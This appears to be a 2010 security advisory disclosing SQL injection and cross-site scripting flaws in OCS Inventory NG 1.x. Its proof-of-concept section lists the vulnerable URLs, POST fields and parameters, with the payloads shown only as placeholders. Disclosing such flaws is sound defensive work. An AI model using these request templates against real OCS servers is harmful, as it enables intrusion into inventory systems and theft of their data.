OCSinventory-ng
Multiple remote vulnerabalities as ben descovered in OCS Inventory NG Management server, sql inyeccion and xss
This vulneravility afect version 1.x
[Name]
OCS Inventory
[vendor]
http://www.ocsinventory-ng.org/
[Download]
http://www.ocsinventory-ng.org/index.php?page=1-02-1
[Category]
web server aplication
[OS afected]
Linux - Windows
------------------------------
-----------------------------------------------------------------------------------------
Vulnerability
[Category]
Cros site scriptting (XSS), SQL Iny.
[Affect Version]
1.x
[Discovered]
22/01/2010
[Reported]
22/01/2010
[Author]
Hernan Jais
[Mail]
hernanjais1[at]gmail[dot]com
[Web]
www.dhcsecurity.com.ar
[POC]
SQL INY GET variables
http://localhost/ocsreports/index.php?&cuaff=NA&key=1&lareq=Computadores+que+tienen+una+etiqueta+dada&c=[SQL INY]&rev=1&page=1
SQL INY POST variables paginator
http://localhost/ocsreports/index.php?multi=1
POST: chm_0=useragent&lbl_0=Agente%
2Bde%2Busuario&ega_0=IGUAL&val_0=OCS-NG_windows_client_v4054&act_1=on&chm_1=ipaddr&lbl_1=Direcci%25F3n%2BIP&ega_1=IGUAL[XSS]&val_1=+[SQL INY]&max=2&sub=Buscar
http://localhost/ocsreports/index.php?multi=36
POST: onglet_bis=A[SQL INY]&old_onglet_bis=C&pcparpage=20&page=0&old_pcparpage=20&search=&COMPAR=%3C&NBRE=&OLD_ONGLET=C
XSS
http://localhost/ocsreports/index.php?&[XSS]cuaff=NA&[XSS]key=1&[XSS]lareq=Computadores+que+tienen+una+etiqueta+dada&[XSS]c=h.memory&[XSS]a=1&[XSS]rev=1&[XSS]page=1[XSS]
-------------------------------------------------------------------------------------------------------------------